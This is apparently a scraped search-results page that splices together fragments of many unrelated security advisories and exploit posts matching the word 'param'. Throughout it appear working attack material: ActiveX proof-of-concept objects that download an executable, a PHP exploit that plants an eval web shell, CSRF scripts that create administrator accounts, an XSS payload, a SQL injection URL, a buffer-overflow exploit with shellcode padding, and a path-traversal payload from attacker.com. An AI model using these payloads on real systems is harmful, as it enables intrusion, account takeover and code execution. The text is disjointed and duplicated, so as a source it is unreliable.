Next Page >>
param
something like the following code:
<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
codebase="http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8" width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
</body></html>
print of a host resident print job, archived print job or a report
stream through a server-side script request.
Anzio Web Print Object is vulnerable to a buffer overflow attack, which
can be exploited by remote attackers to execute arbitrary code, by
providing a malicious web page with a long "mainurl" parameter for the
WePO ActiveX component.
*Vulnerable Packages*
print "Email account's email\n";
print "File PHP script upload and execute\n";
print "Id account'id\n\n";
exit();
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressBackground" VALUE="#bccee8">
<PARAM NAME="propTextBackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
> 325 applyDbAudit($action);
> 326 &delline($linenum,2);
> 327 cleanSiteFingerPrints($deletesitename);
> 328
> 329 &deleteSiteConf($deletesitename);
> 330 $site_params="$CTMP_DIR/".$deletesitename."_params";
> 331 system("rm -f $site_params");
>
>
> And applicure-lib2.pl:
>
325 applyDbAudit($action);
326 &delline($linenum,2);
327 cleanSiteFingerPrints($deletesitename);
328
329 &deleteSiteConf($deletesitename);
330 $site_params="$CTMP_DIR/".$deletesitename."_params";
331 system("rm -f $site_params");
And applicure-lib2.pl:
log/sysbacktrace.81:30
4. Here is a grep that shows where the password is actually being recorded, it includes the system ip, the domain, the username and the password. (Username, domain, and password have been masked with ###).
root@ultidesk:~/logs# grep -R rpcclient2 * | more
..
log/sysbacktrace.84:0 500 9429 9428 18 0 9244 1328 - S ? 0:00 rpcclient2 //10.20.36.233/ -W #### -U #######%############# --param 10.20.36.233 system 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9432 9431 19 0 9116 1328 - S ? 0:00 rpcclient2 //10.4.90.12/ -W #### -U #######%############# --param 10.4.90.12 security 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9423 9422 18 0 8896 1328 - S ? 0:00 rpcclient2 //10.8.32.40/ -W #### -U #######%############# --param 10.8.32.40 system 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 7714 7713 18 0 8776 1328 - S ? 0:00 rpcclient2 //10.20.1.93/ -W #### -U #######%############# --param 10.20.1.93 security 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9813 9812 15 0 8672 1848 - S ? 0:00 rpcclient2 //10.16.34.21/ -W #### -U #######%############# --param 10.16.34.21 security 1 1 0 RPC-EVENTLOG
log/sysbacktrace.84:0 500 9303 9302 19 0 8448 1328 - S ? 0:00 rpcclient2 //10.30.25.130/ -W #### -U #######%############# --param 10.30.25.130 system 1 1 0 RPC-EVENTLOG
DSSIGNIN=url_default; DSOSMLOGIN=x; DSIVS=; DSCheckBrowser=x;
DSID=5beee6a236f28b2c3ccf14d56b34feba; DSLaunchURL=x;
DSBrowserProxy=127.0.0.1%3A8080;
RESULTS (PART OF)
<PARAM NAME="AutoStart" VALUE="false"><param name="locale" value="en">
<param name="upgradeMode" value="">
<param name="Parameter0"
value="cert_md5=8ae8f59ab11a2e6f43b383876d270799;dns-suffix=procheckup.com;switch-dns-search-order=disabled;internal-proxy-config=no;ncp_read_timeout=90;enable_logging=0;enable_logupload=0;win_start_script=;win_end_script=;win_skip_start_script=0;linux_start_script=;linux_end_script=;mac_start_script=;mac_end_script=;signin_url=/e6cf2"><script>alert(1)</script>81d17f3a375;fips_mode=0">
<param name="Parameter1" value="split-tunneling-routes=">
<param name="Parameter2" value="split-tunneling-mode=1">
from the CHM file's Table of Contents file, and links can directly accessed
regardless of the help files locked state.
Consider this example which references a local html file, and will not render:
<param name="Name" value="I will not work">
<param name="Local" value="pleasegivemeashell.htm">
And this example which will render, and spawn a shell through javascript/vbscript + activex:
<param name="Name" value="shell">
method of the control.
PoC:
<OBJECT ID="DVR" classid="clsid:66F7F252-3FE1-4650-B1E5-94B2A38271C5" STYLE="width: 0px;">
<PARAM NAME="_Version" VALUE="65536">
<PARAM NAME="_ExtentX" VALUE="18203">
<PARAM NAME="_ExtentY" VALUE="13705">
<PARAM NAME="_StockProps" VALUE="0">
<PARAM NAME="Split" VALUE="4">
</OBJECT>
>from the CHM file's Table of Contents file, and links can directly accessed
>regardless of the help files locked state.
>
>Consider this example which references a local html file, and will not render:
>
><param name="Name" value="I will not work"> <param name="Local"
>value="pleasegivemeashell.htm">
>
>And this example which will render, and spawn a shell through
>javascript/vbscript + activex:
>
# Version: <= 5.9.14.1246
# Tested on: xpsp3 ie6
# Greeting to Xunlei Security Center guys,your guys still not yet release patch or new version to fix the vunl which also can #attack Xunlei KanKan Player(http://dl.xunlei.com/xmp.html).I exposed this vunl two weeks ago,are you really responsible for the security of millions users?
# POC Code :
<object id=ooxooxx classid="CLSID:{F3E70CEA-956E-49CC-B444-73AFE593AD7F}">
<PARAM NAME="_cx" VALUE="0xFFFFFFFF">
<PARAM NAME="_cy" VALUE="0xFFFFFFFF">
<PARAM NAME="UiMode" VALUE="-1">
<PARAM NAME="InnerPlayerType" VALUE="-1">
</object>
<object id="GetActiveX"
classid="clsid:CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7"
codebase="http://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cab#Version=1,5,2,35"
type="application/x-oleobject" width="1" height="1">
<param name="Service-URL"
value="http://get.adobe.com/reader/webservices/dlm/" />
<param name="itemid" value="860;941" />
<param name="language" value="" />
<param name="os" value="" />
</object>
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid = 25;
var user = 'amnpardaz';
var pass = 'amnpardaz';
var email = 'amnpardaz@none.com';
var param = {
name: user,
username: user,
email: email,
password: pass,
window.onload = function() {
var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";
var pass = "funky";
var param = {
password1: pass,
password2: pass
};
var form = document.createElement('form');
An authenticated remote attacker could exploit this to generate XSS from
which they could modify or steal confidential data of other users within
the same web domain. (MSA-08-0021)
It was discovered that Moodle did not correctly filter inputs for group
creation, mnet, essay question, HOST param, wiki param, and others.
An authenticated remote attacker could exploit this to generate XSS
from which they could modify or steal confidential data of other users
within the same web domain. (MDL-9288, MDL-11759, MDL-12079, MDL-12793,
MDL-14806)
...
27 function getUserSetting(){
28 $exp = time() + 60*60*24*355;
29 if (isset($_COOKIE[$this->template.'_tpl']) &&
$_COOKIE[$this->template.'_tpl'] == $this->template){
30 foreach($this->_params_cookie as $k=>$v) {
31 $kc = $this->template."_".$k;
32 if (isset($_GET[$k])){
33 $v = $_GET[$k];
34 setcookie ($kc, $v, $exp, '/');
35 }else{
.text:6DAA3EF6 mov [ebp+StartupInfo.cb], 44h
.text:6DAA3EFD call ds:CreateProcessA
So basically the Java-Plugin Browser is running "javaws.exe" without
validating command-line parameters. These parameters can be controlled
by attackers via specially crafted embed html tags within a webpage.
Let's see JavaDeploy.txt:
if (browser == 'MSIE') {
var bid = [block id];
var topic = [name block];
var content = [cookie stealer];
var param = {
id: bid,
block_topic: topic,
block_content: content,
block_vis: 1,
block_style: 1,
1312 |
1313 | if( substr_count( $_toTest, '?' ) > 1 )
1314 | {
1315 | $_secondQueryString = substr( $_toTest,
strrpos( $_toTest, '?' ) + 1 );
1316 | $_secondParams = explode( '&',
$_secondQueryString );
1317 |
1318 | if( count($_secondParams) )
1319 | {
1320 | foreach( $_secondParams as $_param )
http://ruder.cdut.net
Summary:
A parameter injection vulnerability exists in Akamai Download
Manager. By exploiting this vulnerability, the remote attacker can
make the users to download arbitrary file, and save it to arbitrary
location while they are visiting a vicious web page. It means an
attacker who successfully exploits this vulnerability can run
arbitrary code on the affected system.
var pass = 'custom_password';
var email = 'joe_cool@example.com';
var param = {
name: user,
username: user,
HttpSkin,
SkinPath's values. Malicious files which is on attacker's site must
be compressed as ZIP file.
For instance. The below modification copies abnormal files to Windows's
root directory.
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">
In this way an attacker can modify SkinPath's value to All Users's Start
Program Folder. Then he can execute his malicious program when the user
restarts his computer.
===================================================================
--- lib/webrick/accesslog.rb (revision 26065)
+++ lib/webrick/accesslog.rb (working copy)
@@ -54,5 +54,5 @@ module WEBrick
raise AccessLogError,
"parameter is required for \"#{spec}\"" unless param
- params[spec][param] || "-"
+ param = params[spec][param] ? escape(param) : "-"
when ?t
params[spec].strftime(param || CLF_TIME_FORMAT)
@@ -60,8 +60,16 @@ module WEBrick
require('phpsploitclass.php');
head();
if($argc < 3) usage();
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
$cod = 'eval($_SERVER[HTTP_SHELL]);';
$xpl = new phpsploit();
$this->agent('Mozilla Firefox');
$this->cookiejar(1);
$this->mhead();
$this->uri = $this->getparam('url', TRUE);
$this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch');
$this->proxh = $this->getparam('proxhost');
$this->proxa = $this->getparam('proxauth');
[ DESCRIPTION ]
S21sec has discovered a vulnerability in Cezanne 7 that allows injecting
SQL code in text variables.
This issue allows SQL code execution in the application server.
The vulnerable param is "FUNID"
Some examples of the exploitation:
URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/CFLookup.asp?FUNID=7302015;waitfor%20delay%20'0:0:20';--&InIFrame=1
STRING:;waitfor%20delay%20'0:0:20';--
directly via URLs by installing a protocol handler for the scheme "hcp",
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Using hcp:// URLs is intended to be safe, as when invoked via the registered
protocol handler the command line parameter /fromhcp is passed to the help
centre application. This flag switches the help centre into a restricted mode,
which will only permit a whitelisted set of help documents and parameters.
This design, introduced in SP2, is reasonably sound. A whitelist of trusted
documents is a safe way of allowing interaction with the documentation from
> $junk = "\x45\x45\x45\x59";
> $eip = "\x2d\xd1\xe0\x77"; // call eax user32.dll
> $exploit=
>
str_repeat("\x90",268).$eip.$junk."\x90\x90\x90\x0d\x01".str_repeat("\x90",16).$shellcode.str_repeat("\x90",9999);
> echo "<param name=\"RejectedRecordsFile\"
> value=\"$exploit\"/>";
> ?>
> </object>
> </html>
> > user's computer display, as it is shown in the
> > address box of the browser. These days, with a
> > camera phone, the attacker does not have to be
> > James Bond to pull that off.
>
> You could insert as the first param random junk
> that's 100 characters long that will "push" the
> real token off-screen.
Yes.
Next Page>>
|
